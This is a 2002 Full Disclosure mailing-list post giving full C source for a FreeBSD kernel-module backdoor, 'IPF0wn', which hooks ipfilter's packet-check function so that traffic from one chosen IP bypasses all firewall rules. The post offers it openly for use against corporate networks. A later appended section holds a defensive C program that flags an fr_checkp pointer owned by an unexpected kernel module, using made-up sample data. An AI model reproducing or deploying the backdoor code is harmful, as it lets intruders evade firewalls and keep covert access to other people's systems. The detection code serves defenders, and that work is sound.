Full Disclosure mailing list archives
[ElectronicSouls] - ipf backdoor
From: es () hush com
Date: Fri, 29 Nov 2002 13:30:36 -0800
Dear List,

Here is a backdoor you may find useful on your penetration tests; it forces ip filter to receive packets from a specified IP, no matter what the actual ipf rules are.
Put it to good use in the corporate world.

# cat ES-ipf0wn.c
/*
 * ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
 * !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
 * ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
 *
 * IPF0wn (C) KernelPanic & BrainStorm [ElectronicSouls]
 * Tested on: FreeBSD 3.4
 *
 * Idea- BrainStorm / KernelPanic
 * Code- KernelPanic / BrainStorm
 *
 * this will get ipfilter to always accept packets from a special IP
 *
 * Brain's 1st LKM ! so b0w d0wn =)
 *
 * "BrainPanic, thats when kernelpanic and brainstorm get together and code ;)"
 * Greetz:
 * ElectronicSouls,ADM,anti.security.is,TESO,0x7f
 *
 * ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
 * !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
 * ----------------------------- !DO NOT DISTRIBUTE! -----------------------------
 */

#define OWNED "127.0.0.1" /* guess what ?? */

#include <sys/param.h>
#include <sys/systm.h>
#include <sys/malloc.h>
#include <sys/mbuf.h>
#include <sys/kernel.h>
#include <sys/proc.h>
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_var.h>

typedef struct ip ip_t;
typedef struct mbuf mb_t;
typedef int ipfr_t __P((ip_t *, int, void *, int, mb_t **));

static int s_load __P((struct module *, int, void *));
static u_int32_t inaton __P((const char *));

extern ipfr_t *fr_checkp;
static ipfr_t myfr, *fr;

static int
s_load (struct module *module, int cmd, void *arg)
{
    int s;

    switch(cmd)
    {
        case MOD_LOAD:
            s = splnet();
            fr = fr_checkp;
            fr_checkp = myfr;
            splx(s);
            break;
        case MOD_UNLOAD:
            s = splnet();
            fr_checkp = fr;
            splx(s);
            break;
    }
    return 0;
}

static moduledata_t s_mod_1 = { "ipfil_mod", s_load, 0 };
DECLARE_MODULE(ipfil_mod, s_mod_1, SI_SUB_PSEUDO, SI_ORDER_ANY);

static int
myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp)
{
    if(ip->ip_src.s_addr == inaton(OWNED))
        return 0;
    return(fr(ip, hlen, ifp, out, mp));
}

static u_int32_t
inaton(const char *str)
{
    unsigned long l;
    unsigned int val;
    int i;

    l = 0;
    for(i=0; i < 4; i++)
    {
        l <<= 8;
        if(*str != '\0')
        {
            val = 0;
            while(*str != '\0' && *str != '.')
            {
                val *= 10;
                val += *str - '0';
                str++;
            }
            l |= val;
            if(*str != '\0')
                str++;
        }
    }
    return(htonl(l));
}

/* ps: Brain- check the handler ..*/
/* and dont give it anyone outside ES yet ;) im sure you dont anyway ..later bro */
#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Save the planet."
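The posted module works by replacing the `fr_checkp` function pointer, so a defender can ask which loaded module the current pointer value falls inside and flag any owner other than the kernel or the ipfilter module. The following C program is an added example, not part of the original post; it assumes the pointer value has already been read from kernel memory (for instance with a kernel debugger), and the kldstat listing, module names and addresses in it are constructed.

```c
/* Added example: which loaded module owns the address held in fr_checkp? */
#include <stdio.h>
#include <string.h>
struct kmod { unsigned long base, size; char name[64]; };

/* Constructed sample in kldstat's column layout; names and addresses are made up. */
static const char SAMPLE_KLDSTAT[] =
    "Id Refs Address    Size     Name\n"
    " 1    3 0xc0100000 2b0000   kernel\n"
    " 2    1 0xc0d2a000 2d000    ipl.ko\n"
    " 3    1 0xc0d60000 2000     unknown_mod.ko\n";
static const char *const EXPECTED[] = { "kernel", "ipl.ko" }; /* assumed baseline */

/* Parse "Id Refs Address Size Name" rows (Size is bare hex); returns row count. */
static int parse_kldstat(const char *text, struct kmod *out, int max)
{
    int n = 0, id, refs;
    for (const char *p = text; p && *p && n < max; ) {
        if (sscanf(p, "%d %d %lx %lx %63s", &id, &refs, &out[n].base, &out[n].size, out[n].name) == 5)
            n++;                         /* the header row does not match */
        if ((p = strchr(p, '\n')) != NULL) p++;
    }
    return n;
}

/* Name of the module whose [base, base + size) range holds addr, or NULL. */
static const char *owner_of(const struct kmod *m, int n, unsigned long addr)
{
    for (int i = 0; i < n; i++)
        if (addr >= m[i].base && addr - m[i].base < m[i].size) return m[i].name;
    return NULL;
}

/* 0 if hook points into an expected module, 1 if the owner is unexpected or unknown. */
static int hook_suspicious(const struct kmod *m, int n, unsigned long hook)
{
    const char *owner = owner_of(m, n, hook);
    for (size_t i = 0; owner && i < sizeof EXPECTED / sizeof *EXPECTED; i++)
        if (strcmp(owner, EXPECTED[i]) == 0) return 0;
    return 1;
}

int main(void)
{
    struct kmod m[16];
    int n = parse_kldstat(SAMPLE_KLDSTAT, m, 16);
    unsigned long seen[] = { 0xc0d2b340UL, 0xc0d60480UL }; /* constructed pointer values */
    for (int i = 0; i < 2; i++)
        printf("fr_checkp=0x%lx -> %s\n", seen[i], hook_suspicious(m, n, seen[i]) ? "SUSPICIOUS" : "ok");
    return 0;
}
```

A pointer that resolves to no listed module is reported as suspicious as well, since the check can only vouch for address ranges it knows about.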